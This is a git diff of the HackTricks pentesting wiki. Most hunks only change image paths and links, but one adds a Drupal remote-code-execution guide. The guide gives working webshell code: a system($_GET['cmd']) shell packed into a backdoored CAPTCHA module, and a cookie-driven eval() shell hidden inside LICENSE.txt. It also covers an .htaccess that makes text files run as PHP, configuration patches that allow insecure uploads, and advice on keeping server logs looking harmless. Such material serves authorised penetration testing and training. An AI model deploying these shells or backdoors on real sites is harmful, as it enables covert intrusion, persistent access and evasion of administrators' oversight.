@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -93,7 +93,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Artifactory**](artifactory-hacking-guide.md) * [**Buckets**](buckets/) * [**CGI**](cgi.md) -* [**Drupal**](drupal.md) +* [**Drupal**](drupal/) * [**Flask**](flask.md) * [**Git**](git.md) * [**Golang**](golang.md) 
@@ -159,10 +159,10 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: [**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\ -[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ -[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart**\ -**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **or** [**(M)oodle**](moodle.md)\ -[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md) +[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ +[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\ +**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\ +[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md) ```bash cmsmap [-f W] -F -d <URL> 
@@ -365,7 +365,7 @@ Find more info about web vulns in: You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities. -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal/README.md similarity index 59% rename from network-services-pentesting/pentesting-web/drupal.md rename to network-services-pentesting/pentesting-web/drupal/README.md index 6ff48bb80..e22078b5f 100644 --- a/network-services-pentesting/pentesting-web/drupal.md +++ b/network-services-pentesting/pentesting-web/drupal/README.md @@ -60,25 +60,25 @@ Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `REA In _/user/register_ just try to create a username and if the name is already taken it will be notified: -.png>) +.png>) #### Request new password If you request a new password for an existing username: -.png>) +.png>) If you request a new password for a non-existent username: -.png>) +.png>) ### Get number of users Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error: -.png>) +.png>) - (1) (1) (1).png>) + (1) (1) (1).png>) ### Hidden pages 
@@ -105,75 +105,11 @@ droopescan scan drupal -u http://drupal-site.local ## RCE -### With PHP Filter Module +If you have access to the Drupal web console check these options to get RCE: -{% hint style="warning" %} -In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." -{% endhint %} - -You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**) - -Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_ - - (1).png>) - -Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_ - -.png>) - -Finally just access the newly created node: - -```bash -curl http://drupal-site.local/node/3 -``` - -### Install PHP Filter Module - -From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**. - -1. Download the most recent version of the module from the Drupal website. - 1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz -2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**. -3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**. -4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**. - -### Backdoored Module - -A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. 
Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz). - -* Download the archive and extract its contents. - -``` -wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz -tar xvf captcha-8.x-1.2.tar.gz -``` - -* Create a **PHP web shell** with the contents: - -```php -<?php -system($_GET["cmd"]); -?> -``` - -* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder. - -```html -<IfModule mod_rewrite.c> -RewriteEngine On -RewriteBase / -</IfModule> -``` - -* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive. - -```bash -mv shell.php .htaccess captcha -tar cvf captcha.tar.gz captcha/ -``` - -* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**. -* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands. +{% content-ref url="drupal-rce.md" %} +[drupal-rce.md](drupal-rce.md) +{% endcontent-ref %} ## Post Exploitation diff --git a/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md new file mode 100644 index 000000000..81e73d604 --- /dev/null +++ b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md 
@@ -0,0 +1,305 @@ +# Drupal RCE + +<details> + +<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +</details> + +## With PHP Filter Module + +{% hint style="warning" %} +In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated." But from version 8 this module is not installed by default. 
+{% endhint %} + +You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**) + +Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_ + + (1).png>) + +Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_ + +.png>) + +Finally just access the newly created node: + +```bash +curl http://drupal-site.local/node/3 +``` + +## Install PHP Filter Module + +{% hint style="warning" %} +In current versions i't no longer possible to install plugins by only having access to the web after the default installation. +{% endhint %} + +From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**. + +1. Download the most recent version of the module from the Drupal website. + 1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz +2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**. +3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**. +4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**. + +## Backdoored Module + +{% hint style="warning" %} +In current versions it's no longer possible to install plugins by only having access to the web after the default installation. +{% endhint %} + +A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). 
Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz). + +* Download the archive and extract its contents. + +``` +wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz +tar xvf captcha-8.x-1.2.tar.gz +``` + +* Create a **PHP web shell** with the contents: + +```php +<?php +system($_GET["cmd"]); +?> +``` + +* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder. + +```html +<IfModule mod_rewrite.c> +RewriteEngine On +RewriteBase / +</IfModule> +``` + +* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive. + +```bash +mv shell.php .htaccess captcha +tar cvf captcha.tar.gz captcha/ +``` + +* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**. +* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands. + +## Backdooring Drupal with Configuration synchronization <a href="#backdooring-drupal" id="backdooring-drupal"></a> + +**Post shared by** [**Coiffeur0x90**](https://twitter.com/Coiffeur0x90) + +### Part 1 (activation of _Media_ and _Media Library_) + +In the _Extend_ menu (/admin/modules), you can activate what appear to be plugins already installed. By default, plugins _Media_ and _Media Library_ don’t appear to be activated, so let’s activate them. 
+ +Before activation: + +<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure> + +After activation: + +<figure><img src="../../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure> + +<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure> + +### Part 2 (leveraging feature _Configuration synchronization_) <a href="#part-2-leveraging-feature-configuration-synchronization" id="part-2-leveraging-feature-configuration-synchronization"></a> + +We’ll leverage the _Configuration synchronization_ feature to dump (export) and upload (import) Drupal configuration entries: + +* /admin/config/development/configuration/single/export +* /admin/config/development/configuration/single/import + +**Patch system.file.yml** + +Let’s start by patching the first entry `allow_insecure_uploads` from: + +File: system.file.yml + +``` + +... + +allow_insecure_uploads: false + +... + +``` + +<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure> + +To: + +File: system.file.yml + +``` + +... + +allow_insecure_uploads: true + +... + +``` + +<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure> + +**Patch field.field.media.document.field\_media\_document.yml** + +Then, patch the second entry `file_extensions` from: + +File: field.field.media.document.field\_media\_document.yml + +``` + +... + + file_directory: '[date:custom:Y]-[date:custom:m]' + file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages' + +... +``` + +<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure> + +To: + +File: field.field.media.document.field\_media\_document.yml + +``` +... 
+ + file_directory: '[date:custom:Y]-[date:custom:m]' + file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages' + +... + +``` + +> I don’t use it in this blogpost but it is noted that it is possible to define the entry `file_directory` in an arbitrary way and that it is vulnerable to a path traversal attack (so we can go back up within the Drupal filesystem tree). + +<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure> + +### Part 3 (leveraging feature _Add Document_) <a href="#part-3-leveraging-feature-add-document" id="part-3-leveraging-feature-add-document"></a> + +The last step is the simplest, and is broken down into two sub-steps. The first is to upload a file in .htaccess format to leverage the Apache directives and allow .txt files to be interpreted by the PHP engine. The second is to upload a .txt file containing our payload. + +File: .htaccess + +``` +<Files *> + SetHandler application/x-httpd-php +</Files> + +# Vroum! Vroum! +# We reactivate PHP engines for all versions in order to be targetless. +<IfModule mod_php.c> + php_flag engine on +</IfModule> +<IfModule mod_php7.c> + php_flag engine on +</IfModule> +<IfModule mod_php5.c> + php_flag engine on +</IfModule> +``` + +Why is this trick cool? + +Because once the Webshell (that we’ll call LICENSE.txt ) is dropped onto the Web server, we can transmit our commands via `$_COOKIE` and in the Web server logs, this will show up as a legitimate GET request to a text file. + +Why name our Webshell LICENSE.txt? + +Simply because if we take the following file, for example [core/LICENSE.txt](https://github.com/drupal/drupal/blob/11.x/core/LICENSE.txt) (which is already present in the Drupal core), we have a file of 339 lines and 17.6 KB in size, which is perfect for adding a small snippet of PHP code in the middle (since the file is big enough). 
+ +<figure><img src="../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure> + +File: Patched LICENSE.txt + +```txt + +... + +this License, you may choose any version ever published by the Free Software +Foundation. + +<?php + +# We inject our payload into the cookies so that in the logs of the compromised +# server it shows up as having been requested via the GET method, in order to +# avoid raising suspicions. +if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) { + if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) { + eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]); + } else { + phpinfo(); + } +} + +?> + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author + +... + +``` + +#### **Part 3.1 (upload file .htaccess)** + +First, we leverage the _Add Document_ (/media/add/document) feature to upload our file containing the Apache directives (.htaccess). + +<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure> + +<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure> + +<figure><img src="../../../.gitbook/assets/image (10).png" alt=""><figcaption></figcaption></figure> + +**Part 3.2 (upload file LICENSE.txt)** + +Then, we leverage the _Add Document_ (/media/add/document) feature again to upload a Webshell hidden within a license file. 
+ +<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure> + +<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure> + +<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure> + +### Part 4 (interaction with the Webshell) <a href="#part-4-interaction-with-the-webshell" id="part-4-interaction-with-the-webshell"></a> + +The last part consists of interacting with the Webshell. + +As shown in the following screenshot, if the cookie expected by our Webshell is not defined, we get the subsequent result when consulting the file via a Web browser. + +<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> + +When the attacker sets the cookie, he can interact with the Webshell and execute any commands he wants. + +<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure> + +And as you can see in the logs, it looks like only a txt file has been requested. + +<figure><img src="../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure> + +Thank you for taking the time to read this article, I hope it will help you get some shells. + +<details> + +<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +</details> diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md index 603f0c114..bd72874f1 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md @@ -22,7 +22,7 @@ If the preload script exposes an IPC endpoint from the main.js file, the rendere Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example): -<figure><img src="../../../.gitbook/assets/image (9).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure> ## Example 1 
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md index 60b79b2b5..87e1de4ca 100644 --- a/network-services-pentesting/pentesting-web/jira.md +++ b/network-services-pentesting/pentesting-web/jira.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe) * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan) -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md index cfb893dc1..0966bd4ee 100644 --- a/network-services-pentesting/pentesting-web/nginx.md +++ b/network-services-pentesting/pentesting-web/nginx.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -315,7 +315,7 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) * [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115) -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/network-services-pentesting/pentesting-web/werkzeug.md b/network-services-pentesting/pentesting-web/werkzeug.md index a97bc1bc2..5162244ed 100644 --- a/network-services-pentesting/pentesting-web/werkzeug.md +++ b/network-services-pentesting/pentesting-web/werkzeug.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -183,7 +183,7 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a * [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833) * [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python) -<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/pentesting-web/browser-extension-pentesting-methodology/README.md b/pentesting-web/browser-extension-pentesting-methodology/README.md index 1e89f4d80..d806f372b 100644 --- a/pentesting-web/browser-extension-pentesting-methodology/README.md +++ b/pentesting-web/browser-extension-pentesting-methodology/README.md 
@@ -22,7 +22,7 @@ Browser extensions are written in JavaScript and loaded by the browser in the ba Extension layouts look best when visualised and consists of three components. Let’s look at each component in depth. -<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (16) (1).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure> ### **Content Scripts** diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index 6faeb47c1..b38c8a596 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -45,7 +45,7 @@ To exploit a CSRF vulnerability, several conditions must be met: You could **capture the request in Burp** and check CSRF protections and to test from the bowser you can click on **Copy as fetch** and check the request: -<figure><img src="../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (11) (1).png" alt=""><figcaption></figcaption></figure> ### Defending Against CSRF diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index ce64766b6..a07427f08 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie * [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md index 4d7346a05..a8206fda3 100644 --- a/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/pentesting-web/hacking-jwt-json-web-tokens.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). 
@@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are {% embed url="https://github.com/ticarpi/jwt_tool" %} -<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md index bb057e489..bd5be4640 100644 --- a/pentesting-web/hacking-with-cookies/README.md +++ b/pentesting-web/hacking-with-cookies/README.md 
@@ -111,11 +111,11 @@ It is important to note that cookies prefixed with `__Host-` are not allowed to So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...: -<figure><img src="../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (6) (1).png" alt=""><figcaption></figcaption></figure> Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies: -<figure><img src="../../.gitbook/assets/image (7).png" alt="" width="373"><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (7) (1).png" alt="" width="373"><figcaption></figcaption></figure> ## Cookies Attacks diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md index d8bb6c987..1a7d443ec 100644 --- a/pentesting-web/ldap-injection.md +++ b/pentesting-web/ldap-injection.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). 
@@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %} -<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md index 1807f3d1c..e6270f448 100644 --- a/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/pentesting-web/sql-injection/postgresql-injection/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -106,7 +106,7 @@ SELECT $$hacktricks$$; SELECT $TAG$hacktricks$TAG$; ``` -<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md index 163204362..13e6f56d7 100644 --- a/pentesting-web/sql-injection/sqlmap/README.md +++ b/pentesting-web/sql-injection/sqlmap/README.md 
